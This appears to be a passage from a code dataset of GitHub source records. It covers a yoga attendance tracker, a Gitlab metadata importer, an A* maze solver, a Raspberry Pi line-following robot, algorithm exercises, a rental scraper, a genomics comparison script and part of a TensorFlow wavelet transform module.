print(\"For example: Camden Town\")\n print(Fore.CYAN)\n location_data_str = input(\"Enter your data here:\\n\")\n print(\"\\033[39m\")\n location_data = location_data_str.title()\n\n try:\n location_col = capacity.col_values(1)\n del location_col[0]\n if location_data in location_col:\n print(\"\\n\")\n # append user input to a list of user inputs\n new_lesson_data.append(location_data)\n\n # location_index Stores globally the index of the location\n # input by the user from the list pulled from the worksheet.\n # This will be used when inputting student attendance to\n # identify the capacity of the studio and run an error if\n # attendance input is too high.\n\n global location_index\n location_index = 0\n location_data_index = location_col.index(location_data)\n location_index = location_data_index\n break\n else:\n raise ValueError()\n except ValueError:\n print(Fore.RED)\n print(f\"Invalid data: {location_data_str}, please try again\\n\")\n print(\"\\033[39m\")\n\n\ndef lesson_attendance_data():\n \"\"\"\n Input and validate 'attendance' data from the user and\n return error if incorrect data submitted\n\n Used the following website to help with using the\n Global keyword:\n https://www.w3schools.com/python/python_variables_global.asp\n \"\"\"\n while True:\n # column of capacity data for each location\n location_capacity = capacity.col_values(2)\n # deletes the first item in column of data\n del location_capacity[0]\n\n try:\n print(\"Please provide the number of students who attended.\")\n print(Fore.CYAN)\n lesson_attendance_str = input(\n \"Enter student attendance here:\\n\")\n print(\"\\033[39m\")\n lesson_attendance = int(lesson_attendance_str)\n\n # Get the capacity using the index stored in location_index\n # I used\n # https://www.programiz.com/python-programming/methods/list/index\n # to help with using the index to check a user input\n capacity_index = int(location_capacity[location_index])\n\n global attendance_total\n attendance_total = 0\n attendance_input = lesson_attendance\n attendance_total = attendance_input\n\n if lesson_attendance <= capacity_index:\n # append user input to a list of user inputs\n new_lesson_data.append(lesson_attendance)\n break\n else:\n while True:\n print(Fore.YELLOW)\n print(f\"{lesson_attendance} is above capacity\\n\")\n print(\"Do you wish to continue?\")\n higher_capacity = input(\"y/n \\n\")\n add_higher_cap = higher_capacity.upper()\n print(\"\\033[39m\")\n if add_higher_cap == \"Y\":\n new_lesson_data.append(lesson_attendance)\n return False\n elif add_higher_cap == \"N\":\n return lesson_attendance_data()\n else:\n raise ValueError()\n except ValueError as e:\n print(Fore.RED)\n print(f\"Data invalid: {e}, please try again\\n\")\n print(\"\\033[39m\")\n\n\ndef calculate_earnings():\n \"\"\"\n Calculate the earnings for the lesson using the attendance\n and duration input by the user and the price list\n on the linked spreadsheet\n \"\"\"\n\n lesson_price = prices.col_values(2)\n del lesson_price[0]\n\n price = int(lesson_price[duration_index])\n\n lesson_earnings = price * attendance_total\n\n # I've placed the below print statement here as input\n # data should not push back into the worksheet if it\n # isn't valid\n print(f\"\\n{Fore.LIGHTGREEN_EX}Data input is valid!\\n\")\n print(\"\\033[39m\")\n\n print(\n f\"Total earnings for this class is: {Fore.GREEN}£{lesson_earnings} \\n\")\n print(\"\\033[39m\")\n # append calculation to a list of user inputs\n new_lesson_data.append(lesson_earnings)\n\n\ndef 
update_attendance_worksheet(data):\n    \"\"\"\n    Push user inputs and calculations stored in the\n    new_lesson_data list back into the attendance worksheet\n    \"\"\"\n\n    print(Fore.BLUE)\n    print(\"Updating worksheet... \\n\")\n    # appends user inputs and calculations into the attendance worksheet\n    worksheet_update.append_row(data)\n\n    print(\"Attendance worksheet updated! \\n\")\n    print(\"\\033[39m\")\n\n\ndef lesson_data():\n    \"\"\" Runs all the data collection functions in order\n    \"\"\"\n    lesson_day_data()\n    lesson_date_data()\n    lesson_time_data()\n    lesson_duration_data()\n    lesson_location_data()\n    lesson_attendance_data()\n    data = new_lesson_data\n    calculate_earnings()\n    update_attendance_worksheet(data)\n    return add_more_data()\n\n\ndef add_more_data():\n    \"\"\" Loops back to the beginning if\n    the user has more data to add.\n\n    Used the following website to help write\n    the code below:\n    https://maschituts.com/2-ways-to-loop-back-to-the-beginning-of-a-program-in-python/\n    \"\"\"\n    try:\n        print(Fore.YELLOW)\n        add_data = input(\"Do you want to add more data [y/n]?\\n\")\n        print(\"\\033[39m\")\n        new_data = add_data.upper()\n        if new_data == \"Y\":\n            new_lesson_data.clear()\n            print(\"\\n\")\n            return lesson_data()\n        elif new_data == \"N\":\n            print(\"\\n\")\n        else:\n            raise ValueError()\n    except ValueError:\n        print(Fore.RED)\n        print(\"Invalid input, please input y/n \\n\")\n        print(\"\\033[39m\")\n        return add_more_data()\n\n\ndef calculate_total_earnings():\n    \"\"\"\n    Return to the user their total earnings so far.\n    \"\"\"\n    all_earnings = worksheet_update.col_values(7)\n    del all_earnings[0]\n    # Used method 3 to turn a list of strings into a list of integers\n    # https://www.geeksforgeeks.org/python-converting-all-strings-in-list-to-integers/\n    all_earnings_int = list(map(int, all_earnings))\n\n    earnings_total = sum(all_earnings_int)\n    print(f\"Total earnings to date: {Fore.GREEN}£{earnings_total}\")\n    print(\"\\033[39m\")\n    print(Fore.LIGHTMAGENTA_EX)\n    print(\"Thank you, goodbye for now...\")\n    print(\"\\033[39m\")\n\n\nlesson_data()\ncalculate_total_earnings()\n","repo_name":"SamanthaBooth81/yoga-flow-class-record","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":13229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
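The date check in lesson_date_data above splits the input on '/' by hand before building a date. A minimal sketch of the same validation done in one call with datetime.strptime, which also rejects impossible dates such as 31/13/23 (the function name parse_lesson_date is illustrative, not from the original run.py):

from datetime import datetime

def parse_lesson_date(text):
    # Return a date for 'dd/mm/yy' input, or None if it does not parse.
    try:
        return datetime.strptime(text, "%d/%m/%y").date()
    except ValueError:
        return None

print(parse_lesson_date("31/01/23"))  # 2023-01-31
print(parse_lesson_date("31/13/23"))  # None (month out of range)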
+{"seq_id":"24823812835","text":"#!/usr/bin/env python3\n\nimport sys\nfrom unitypack.asset import Asset\n\ndef main(f):\n\tasset = Asset.from_file(f)\n\n\tfor id, obj in asset.objects.items():\n\t\tname = ''\n\t\tif hasattr(obj.read(), 'name'):\n\t\t\tname = obj.read().name\n\t\tprint('{}\\t{}\\t{}\\t{}'.format(id, obj.type_id, obj.type, name))\n\nif __name__ == '__main__':\n\twith open(sys.argv[1], 'rb') as f:\n\t\tmain(f)\n","repo_name":"dongresource/UnityPackFF","sub_path":"bin/list_contents.py","file_name":"list_contents.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"}
+{"seq_id":"34752532972","text":"# Write a function, tree_min_value, that takes in the root of a binary tree that contains number values. The function should return the minimum value within the tree.\n\n# You may assume that the input tree is non-empty.\n\n# input: root of tree\n# output: min value\n# create a queue\n# create result to hold min and have it = float(inf)\n# while queue to iterate until empty\n# create current to hold popleft node\n# if current.val < result result = current.val\n# return result\n\nfrom collections import deque\nimport math\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n# iterative solution\n# time O(n) since we iterate through n nodes\n# space O(n) since we create queue\ndef tree_min_value(root):\n result = math.inf\n queue = deque([root])\n\n while queue:\n current = queue.popleft()\n\n if current.val < result:\n result = current.val\n\n if current.right:\n queue.append(current.right)\n if current.left:\n queue.append(current.left)\n\n return result\n\n# recursive solution\n\ndef tree_min_value_recur(root, result = math.inf):\n if root is None:\n return math.inf\n\n left = tree_min_value_recur(root.left, result)\n right = tree_min_value_recur(root.right, result)\n\n return min(root.val, left, right)\n\n\na = Node(3)\nb = Node(11)\nc = Node(4)\nd = Node(4)\ne = Node(-2)\nf = Node(1)\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\n\n# 3\n# / \\\n# 11 4\n# / \\ \\\n# 4 -2 1\nprint(tree_min_value(a)) # -> -2\nprint(tree_min_value_recur(a)) # -> -2\n","repo_name":"Jblancs/DSA","sub_path":"structy/binary-tree/5-tree-min-value.py","file_name":"5-tree-min-value.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"37759390764","text":"\"\"\"\nUses the Gitlab API to learn more about the Gitlab projects.\n\"\"\"\n\nimport os\nimport json\nfrom utils import constants as c, utils, osg, osg_gitlab, osg_parse\n\ngl_entries_file = os.path.join(c.code_path, 'gitlab_entries.txt')\nprefix = 'https://gitlab.com/'\n\n# these may give errors and should be ignored\nignored_repos = ()\n\ndef collect_gitlab_entries():\n \"\"\"\n Reads the entries of the database and collects all entries with a Gitlab repository. Just for convenience to limit\n the number of entries to iterate on later.\n \"\"\"\n\n # read entries\n entries = osg.read_entries()\n print('{} entries read'.format(len(entries)))\n\n # loop over entries\n files = []\n for entry in entries:\n urls = [x for x in entry.get('Code repository', []) if x.startswith(prefix)]\n if urls:\n files.append(entry['File'])\n\n # write to file\n print('{} entries with gitlab repos'.format(len(files)))\n utils.write_text(gl_entries_file, json.dumps(files, indent=1))\n\n\ndef gitlab_import():\n \"\"\"\n Import various information from Gitlab repositories (like contributors) or stars for Gitlab repos\n \"\"\"\n private_properties = json.loads(utils.read_text(c.private_properties_file))\n\n files = json.loads(utils.read_text(gl_entries_file))\n\n all_developers = osg.read_developers()\n print(' {} developers read'.format(len(all_developers)))\n\n # all exceptions that happen will be eaten (but will end the execution)\n try:\n # loop over each entry\n for index, file in enumerate(files):\n print(' process {} ({})'.format(file, index))\n\n # read entry\n entry = osg.read_entry(file)\n code_repositories = entry['Code repository']\n repos = [x for x in code_repositories if x.startswith(prefix)]\n repos[0] += ' @add'\n repos = [x for x in repos if '@add' in x]\n repos = [x.split(' ')[0] for x in repos]\n repos = [x for x in repos if x not in ignored_repos]\n for repo in repos:\n print(' GH repo {}'.format(repo))\n\n info = osg_gitlab.retrieve_repo_info(repo)\n\n new_comments = []\n\n # add created comment\n new_comments.append('@created {}'.format(info['created'].year))\n\n # add stars\n new_comments.append('@stars {}'.format(info['stars']))\n\n # add forks\n new_comments.append('@forks {}'.format(info['forks']))\n\n # search for repository\n for r in code_repositories:\n if r.startswith(repo):\n break\n\n # update comment\n comments = r.comment\n if comments:\n comments = comments.split(',')\n comments = [c.strip() for c in comments]\n comments = [c for c in comments if not c.startswith('@')] # delete old ones\n comments += new_comments\n else:\n comments = new_comments\n r.comment = ', '.join(comments)\n\n # language in languages\n for language, usage in info['languages'].items():\n if language in c.known_languages and usage > 5 and language not in entry['Code language']:\n entry['Code language'].append(language)\n print(' added to languages: {}'.format(language))\n\n entry['Code repository'] = code_repositories\n osg.write_entry(entry)\n except:\n raise\n finally:\n # shorten file list\n utils.write_text(gl_entries_file, json.dumps(files[index:], indent=1))\n\n # osg.write_developers(all_developers)\n print('developers database updated')\n\n\ndef gitlab_starring_synchronization():\n \"\"\"\n Which Gitlab repositories haven't I starred yet.\n \"\"\"\n private_properties = json.loads(utils.read_text(c.private_properties_file))\n\n files = json.loads(utils.read_text(gl_entries_file))\n\n # loop over each entry and collect list of repos\n all_repos = []\n for index, 
file in enumerate(files):\n        # read entry\n        entry = osg.read_entry(file)\n\n        # get repos (skip entries without a Gitlab repository)\n        code_repositories = entry.get('Code repository', [])\n        repos = [x for x in code_repositories if x.startswith(prefix)]\n        if not repos:\n            continue\n        repos[0] += ' @add'\n        repos = [x for x in repos if '@add' in x]\n        repos = [x.split(' ')[0] for x in repos]\n        repos = [x for x in repos if x not in ignored_repos]\n        all_repos.extend(repos)\n    all_repos = set(all_repos)\n    print('found {} Gitlab repos'.format(len(all_repos)))\n\n\n\nif __name__ == \"__main__\":\n    # collect entries (run this only once)\n    # collect_gitlab_entries()\n\n    # import information from Gitlab\n    # gitlab_import()\n\n    # which Gitlab repos haven't I starred yet\n    gitlab_starring_synchronization()","repo_name":"Trilarion/opensourcegames","sub_path":"code/gitlab_import.py","file_name":"gitlab_import.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":514,"dataset":"github-code","pt":"3"}
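The retrieve_repo_info call above comes from the project's own osg_gitlab helper, which is not included in this record. A rough sketch of what such a lookup can look like with the python-gitlab package; the field names mirror the Gitlab REST API, but this is an assumption about the helper's behaviour, not its actual code:

import gitlab  # pip install python-gitlab

def fetch_repo_info(path):
    # Anonymous, read-only lookup of a public project, e.g. 'inkscape/inkscape'.
    gl = gitlab.Gitlab('https://gitlab.com')
    project = gl.projects.get(path)
    return {
        'created': project.created_at,   # ISO 8601 timestamp string
        'stars': project.star_count,
        'forks': project.forks_count,
    }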
+{"seq_id":"4950536852","text":"import random\nfrom typing import List\n\nfrom a_star_terminal.a_star import a_star\nfrom a_star_terminal.utils import (Location, Cell, euclidean_distance,\n manhattan_distance, Node, path_to_node, chebyshev_distance)\n\n\nclass Maze:\n def __init__(self, rows: int, columns: int, start_location: Location, goal_location: Location):\n self._rows = rows\n self._columns = columns\n self._start: Location = start_location\n self._goal: Location = goal_location\n self._grid = [[Cell.EMPTY for _ in range(columns)]\n for _ in range(rows)]\n self._grid[start_location.row][start_location.column] = Cell.START\n self._grid[goal_location.row][goal_location.column] = Cell.GOAL\n self._fill_random()\n\n def successor(self, location: Location, allow_diagonal=False) -> List[Location]:\n \"\"\"\n Given a location, return all the possible state of the location\n :param allow_diagonal\n :param location\n :return: list of available location\n \"\"\"\n list_of_neighbor: List[Location] = []\n if location.column - 1 >= 0 and self._grid[location.row][location.column - 1] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row, location.column - 1))\n if location.row + 1 < self._rows and self._grid[location.row + 1][location.column] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row + 1, location.column))\n if location.column + 1 < self._columns and self._grid[location.row][location.column + 1] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row, location.column + 1))\n if location.row - 1 >= 0 and self._grid[location.row - 1][location.column] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row - 1, location.column))\n # Check for diagonal neighbor if possible\n if not allow_diagonal:\n return list_of_neighbor\n # top-right\n if (location.column - 1 >= 0 and location.row + 1 < self._rows) and self._grid[\n location.row + 1][location.column - 1] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row + 1, location.column - 1))\n # bottom-right\n if (location.column + 1 < self._columns and location.row + 1 < self._rows) and self._grid[\n location.row + 1][location.column + 1] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row + 1, location.column + 1))\n # bottom - left\n if (location.column + 1 < self._columns and location.row - 1 >= 0) and self._grid[\n location.row - 1][location.column + 1] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row - 1, location.column + 1))\n # top-left\n if (location.column - 1 >= 0 and location.row - 1 >= 0) and self._grid[\n location.row - 1][location.column - 1] != Cell.BLOCK:\n list_of_neighbor.append(Location(location.row - 1, location.column - 1))\n return list_of_neighbor\n\n def goal_check(self, location: Location) -> bool:\n \"\"\"\n Check if the location is the same as goal\n :param location\n :return: bool\n \"\"\"\n return self._goal == location\n\n def mark(self, paths: List[Location]):\n \"\"\"\n Mark all the location in path as PATH\n :param paths: List of location\n \"\"\"\n for location in paths:\n self._grid[location.row][location.column] = Cell.PATH\n self._grid[self._start.row][self._start.column] = Cell.START\n self._grid[self._goal.row][self._goal.column] = Cell.GOAL\n\n def __str__(self):\n \"\"\"\n represent maze in the terminal\n :return: maze representation: str\n \"\"\"\n output = \"\"\n for row in self._grid:\n output += \"\".join([cell.value for cell in row]) + \"\\n\"\n return output\n\n def _fill_random(self):\n \"\"\"\n Create random block, each cell 
has a 0.2 chance of being a BLOCK\n        \"\"\"\n        for i, row in enumerate(self._grid):\n            for j, value in enumerate(row):\n                if value == Cell.EMPTY and random.uniform(0, 1) < 0.2:\n                    self._grid[i][j] = Cell.BLOCK\n\n\nif __name__ == '__main__':\n    start = Location(0, 0)\n    goal = Location(9, 9)\n    euclidean_heuristic = euclidean_distance(goal)\n    manhattan_heuristic = manhattan_distance(goal)\n    chebyshev_heuristic = chebyshev_distance(goal)\n    maze: Maze = Maze(10, 10, start, goal)\n    solution: Node = a_star(start, maze.goal_check, maze.successor, chebyshev_heuristic, True)\n    print(maze)\n    if not solution:\n        print(\"No solution was found\")\n    else:\n        path = path_to_node(solution)\n        maze.mark(path)\n        print(maze)\n","repo_name":"Ahmed-Alsardi/a-star-algorithms","sub_path":"a_star_terminal/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
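The __main__ block above passes chebyshev_heuristic to a_star with allow_diagonal=True, and that pairing is deliberate: when a diagonal step costs 1 and moves one unit in both coordinates, Chebyshev distance is the only one of the three heuristics that never overestimates. A stand-alone sketch (the project's real implementations live in a_star_terminal.utils, which is not shown here):

def euclidean(r, c, gr, gc): return ((r - gr) ** 2 + (c - gc) ** 2) ** 0.5
def manhattan(r, c, gr, gc): return abs(r - gr) + abs(c - gc)
def chebyshev(r, c, gr, gc): return max(abs(r - gr), abs(c - gc))

# From (0, 0) to (9, 9) the true 8-connected distance is 9; Manhattan (18)
# and Euclidean (~12.73) overestimate it, so only Chebyshev is admissible.
print(euclidean(0, 0, 9, 9), manhattan(0, 0, 9, 9), chebyshev(0, 0, 9, 9))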
+{"seq_id":"7190758093","text":"from GLOBAL_VAR import *\nfrom METHOD_VAR import *\n\n### Test number of ts-eGenes\nTested_Method_N = {}\nfor geneGroup in ['topGene4','topGene6', 'topGene5', 'topGene30']:\n Tested_Method_N[geneGroup] = []\n for tis in range(1,23):\n tp = pd.read_csv('%s/%s_%s_group%d.txt' % (pairdir, LMfn, geneGroup, tis), sep='\\t')\n Tested_Method_N[geneGroup].append(len(tp))\n\n\n# spMF\n\nold_pairdir = '/work-zfs/abattle4/heyuan/tissue_spec_eQTL_v8/downstream/pairSets/'\n\nr2 = '1'\nFDR = 0.05\n\nFMfn = 'SparseMF_coph_%s_topPair_K30_a11_l110' % prefix.replace(r2, '0.2')\nLMfn= '%s%s_Loadings_beta_BH_corrected_alpha%s' % (FMfn, LDprefix, str(FDR))\n\nspMF_N = {}\n\nfor geneGroup in ['topGene5', 'topGene22']:\n spMF_N[geneGroup] = []\n for k in range(1, 23):\n tp = pd.read_csv('%s/%s_%s_group%d.txt' % (old_pairdir, LMfn, geneGroup, k), sep='\\t')\n spMF_N[geneGroup].append(len(tp))\n \n \nx = Tested_Method_N['topGene4']\ny = spMF_N['topGene5']\nprint(np.mean(x), np.mean(y))\n\n\nx = Tested_Method_N['topGene30']\ny = spMF_N['topGene22']\nprint(np.mean(x), np.mean(y))\n\n","repo_name":"heyuan7676/ts_eQTLs","sub_path":"Extended_Methods/Downstream_analysis/scripts/6_GSEA_Genesets_compare.py","file_name":"6_GSEA_Genesets_compare.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"}
+{"seq_id":"40726414959","text":"import cv2\nimport numpy as np\nimport RPi.GPIO as GPIO\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 160)\ncap.set(4, 120)\n\nin1 = 4\nin2 = 17\nin3 = 27\nin4 = 22\nen1 = 23\nen2 = 24\n\nGPIO.setwarnings(False) # Disable GPIO warnings\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(en1, GPIO.OUT)\nGPIO.setup(en2, GPIO.OUT)\nGPIO.setup(in1, GPIO.OUT)\nGPIO.setup(in2, GPIO.OUT)\nGPIO.setup(in3, GPIO.OUT)\nGPIO.setup(in4, GPIO.OUT)\np1 = GPIO.PWM(en1, 150)\np2 = GPIO.PWM(en2, 150)\np1.start(40)\np2.start(40)\nGPIO.output(in1, GPIO.LOW)\nGPIO.output(in2, GPIO.LOW)\nGPIO.output(in3, GPIO.LOW)\nGPIO.output(in4, GPIO.LOW)\n\nprevious_error = 0\n\nwhile True:\n ret, frame = cap.read()\n\n # Convert frame to HSV color space\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n # Define the lower and upper bounds for the black line color\n lower_black = np.array([0, 0, 0], dtype=np.uint8)\n upper_black = np.array([180, 255, 50], dtype=np.uint8)\n\n # Apply color thresholding to isolate the black line\n mask = cv2.inRange(hsv, lower_black, upper_black)\n\n # Apply morphology operations to enhance the black line detection\n kernel = np.ones((3, 3), np.uint8)\n mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\n mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)\n\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n if len(contours) > 0:\n c = max(contours, key=cv2.contourArea)\n M = cv2.moments(c)\n\n if M[\"m00\"] != 0:\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n print(\"CX: \" + str(cx) + \" CY: \" + str(cy))\n\n # Calculate the error as the difference between the current x-coordinate and the desired center (80 in this case)\n error = cx - 80\n\n # Adjust the scaling factor as per your requirements\n proportional_control = 0\n derivative_control = 1\n \n previous_error = 1\n integral_term = 2\n\n # Calculate the change in error\n delta_error = error - previous_error\n\n # Calculate the steering command based on the error and proportional control\n steering = int(proportional_control * error + derivative_control * delta_error)\n\n # Limit the steering command within a certain range\n max_steering = 1\n steering = max(-max_steering, min(steering, max_steering))\n\n # Set the motor speeds and directions\n if steering < 0:\n print(\"Turn Right\")\n GPIO.output(in1, GPIO.LOW)\n GPIO.output(in2, GPIO.HIGH)\n GPIO.output(in3, GPIO.LOW)\n GPIO.output(in4, GPIO.HIGH)\n p1.ChangeDutyCycle(100)\n p2.ChangeDutyCycle(1 - abs(steering))\n elif steering > 0:\n print(\"Turn Left\")\n GPIO.output(in1, GPIO.HIGH)\n GPIO.output(in2, GPIO.LOW)\n GPIO.output(in3, GPIO.HIGH)\n GPIO.output(in4, GPIO.LOW)\n p1.ChangeDutyCycle(1 - abs(steering))\n p2.ChangeDutyCycle(100)\n else:\n print(\"On Track!\")\n GPIO.output(in1, GPIO.LOW)\n GPIO.output(in2, GPIO.HIGH)\n GPIO.output(in3, GPIO.LOW)\n GPIO.output(in4, GPIO.HIGH)\n p1.ChangeDutyCycle(80)\n p2.ChangeDutyCycle(80)\n\n # Update the previous error\n previous_error = error\n\n # Draw a white dot at the center of the line\n cv2.circle(frame, (cx, cy), 5, (255, 255, 255), -1)\n\n else:\n print(\"I don't see the line\")\n GPIO.output(in1, GPIO.HIGH)\n GPIO.output(in2, GPIO.HIGH)\n GPIO.output(in3, GPIO.HIGH)\n GPIO.output(in4, GPIO.HIGH)\n p1.ChangeDutyCycle(0)\n p2.ChangeDutyCycle(0)\n\n cv2.drawContours(frame, c, -1, (0, 255, 0), 1)\n\n cv2.imshow(\"Mask\", mask)\n cv2.imshow(\"Frame\", frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n GPIO.output(in1, GPIO.HIGH)\n GPIO.output(in2, 
GPIO.HIGH)\n GPIO.output(in3, GPIO.HIGH)\n GPIO.output(in4, GPIO.HIGH)\n p1.stop()\n p2.stop()\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"akimaziz/RaspberiPi-OS-OpenCV-setup","sub_path":"hakimipi.py","file_name":"hakimipi.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
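The steering rule in the loop above mixes gains, clamping and GPIO writes together. A hedged sketch of the same PD logic pulled out into a pure function, so the gains can be tuned and tested off the robot (the kp/kd values here are illustrative placeholders, not the original tuning):

def pd_steering(cx, previous_error, kp=0.05, kd=0.02, setpoint=80, limit=1.0):
    # Return (steering, error) for a line centroid detected at column cx.
    error = cx - setpoint
    delta = error - previous_error
    steering = kp * error + kd * delta
    steering = max(-limit, min(steering, limit))
    return steering, error

s, e = pd_steering(cx=120, previous_error=0)
print(s, e)  # kp*40 + kd*40 = 2.8, clamped to 1.0; error 40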
+{"seq_id":"19998819023","text":"from ..properties.UniversityRealtyProperty import UniversityRealtyProperty\nfrom BaseCompanyExcel import BaseCompanyExcel\nclass UniversityRealty(BaseCompanyExcel):\n\tname ='University Realty'\n\tcity ='Austin'\n\tstate ='TX'\n\n\tdef setup(self):\n\t\tself.set_col_headers( [\n\t\t\t\t\t\t\t('university_zip_code', 'zip'),\n\t\t\t\t\t\t\t('property', 'property'), \n\t\t\t\t\t\t\t('address', ''), \n\t\t\t\t\t\t\t('university_unit', ''), \n\t\t\t\t\t\t\t('monthly_rent', ''),\n\t\t\t\t\t\t\t('size', ''), \n\t\t\t\t\t\t\t('tenant_phone', ''),\n\t\t\t\t\t\t\t('available', ''),\n\t\t\t\t\t\t\t('end' , ''),\n\t\t\t\t\t\t\t('description', ''),\n\t\t\t\t\t\t ], 'default')\n\t\t# self.set_exempted_rows( [\n\t\t# \t\t\t\t\t'Houses / Multiplex',\n\t\t# \t\t\t\t\t'Rooms Rooms' ,\n\t\t# \t\t\t\t\t'Efficiencies Effs',\n\t\t# \t\t\t\t\t'1 Bedrooms 1 Bd',\n\t\t# \t\t\t\t\t'1 Bedroom 1-Bd',\n\t\t# \t\t\t\t\t'2 bedroom 2-Bd',\n\t\t# \t\t\t\t\t'Condos/Apts',\n\t\t# \t\t\t\t\t'Condos/Apts 2 Bd',\n\t\t# \t\t\t\t\t'3 Bedroom 3Bd',\n\t\t# \t\t\t\t\t'3 Bedroom 3-Bds',\n\t\t# \t\t\t\t\t'3 Bedroom 3-Bd',\n\t\t# \t\t\t\t\t'4-7 Bedroom 4-7 Bds'\n\t\t# \t\t\t\t\t], 'default', 5)\n\t\n\n\tdef new_property(self, property_data):\n\t\tprop =UniversityRealtyProperty(property_data, self)\t\n\t\treturn prop\n","repo_name":"joshuabuga/scrapper","sub_path":"scraper/src/companies/UniversityRealty.py","file_name":"UniversityRealty.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"43798088373","text":"from collections import deque\ndef bfs(x, y):\n visited = [[False] * m for _ in range(n)]\n queue = deque([(x, y, 0)])\n visited[x][y] = True\n dx = [-1, -1, -1, 0, 1, 0, 1, 1]\n dy = [-1, 0, 1, 1, 1, -1, 0, -1]\n while queue:\n x, y, distance = queue.popleft()\n for i in range(8):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m and not visited[nx][ny]:\n if lst[nx][ny] == 0:\n queue.append((nx, ny, distance+1))\n visited[nx][ny] = True\n else:\n return distance + 1\n\nn, m = map(int, input().split())\nlst = [[int(x) for x in input().split()] for _ in range(n)]\nres = 0\nqueue = deque()\nfor i in range(n):\n for j in range(m):\n if lst[i][j] == 0:\n res = max(res, bfs(i, j))\nprint(res)","repo_name":"KDT-02-Algorithm-Study/Algorithm-Study","sub_path":"week05_230209/17086_아기_상어_2/17086_박현준.py","file_name":"17086_박현준.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"5944002189","text":"import collections.abc\nimport itertools\nimport warnings\n\nimport pywt\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow_mri.python.ops import array_ops\nfrom tensorflow_mri.python.util import api_util\n\n\n@api_util.export(\"signal.dwt\")\ndef dwt(data, wavelet, mode='symmetric', axes=None):\n \"\"\"Single-level N-dimensional discrete wavelet transform (DWT).\n\n Args:\n data: A `tf.Tensor` of real or complex type.\n wavelet: A `str` or a `pywt.Wavelet`_, or a `list` thereof. When passed a\n `list`, different wavelets are applied along each axis in `axes`.\n mode: A `str`. The padding or signal extension mode. Must be one of the\n values supported by `tf.pad`_. Defaults to `'symmetric'`.\n axes: A `list` of `int`. Axes over which to compute the DWT. Repeated\n elements mean the DWT will be performed multiple times along these axes.\n A value of `None` (the default) selects all axes.\n\n Returns:\n A `dict` where key specifies the transform type on each dimension and value\n is an N-dimensional `tf.Tensor` containing the corresponding coefficients.\n\n For example, for a 2D case the result will have keys `'aa'` (approximation\n on 1st dimension, approximation on 2nd dimension), `'ad'` (approximation on\n 1st dimension, detail on 2nd dimension), `'da'` (detail on 1st dimension,\n approximation on 2nd dimension), and `'dd'` (detail on 1st dimension, detail\n on 2nd dimension).\n\n For user-specified `axes`, the order of the characters in the\n dictionary keys map to the specified `axes`.\n\n Raises:\n ValueError: If any of the inputs is not valid.\n\n .. _pywt.Wavelet: https://pywavelets.readthedocs.io/en/latest/ref/wavelets.html#pywt.Wavelet\n .. _tf.pad: https://www.tensorflow.org/api_docs/python/tf/pad\n \"\"\"\n data = tf.convert_to_tensor(data)\n rank = data.shape.rank\n\n # Handle complex numbers.\n if data.dtype.is_complex:\n real = dwt(tf.math.real(data), wavelet, mode, axes)\n imag = dwt(tf.math.imag(data), wavelet, mode, axes)\n return {k: tf.dtypes.complex(real[k], imag[k]) for k in real.keys()}\n\n # Canonicalize axes. If None, compute decomposition along all axes.\n if axes is None:\n axes = range(rank)\n axes = [ax + rank if ax < 0 else ax for ax in axes]\n\n # Get padding mode for each axis.\n wavelets = _wavelets_per_axis(wavelet, axes)\n modes = _modes_per_axis(mode, axes)\n\n coeffs = [('', data)]\n for ax, wav, mod in zip(axes, wavelets, modes):\n new_coeffs = []\n for subband, x in coeffs:\n c_a, c_d = _dwt_along_axis(x, wav, mod, ax)\n new_coeffs.extend([(subband + 'a', c_a),\n (subband + 'd', c_d)])\n coeffs = new_coeffs\n return dict(coeffs)\n\n\n@api_util.export(\"signal.idwt\")\ndef idwt(coeffs, wavelet, mode='symmetric', axes=None):\n \"\"\"Single-level N-dimensional inverse discrete wavelet transform (IDWT).\n\n Args:\n coeffs: A `dict` with the same structure as the output of\n `tfmri.signal.dwt`. Missing or `None` items will be treated as zeros.\n wavelet: A `str` or a `pywt.Wavelet`_, or a `list` thereof. When passed a\n `list`, different wavelets are applied along each axis in `axes`.\n mode: A `str`. The padding or signal extension mode. Must be one of the\n values supported by 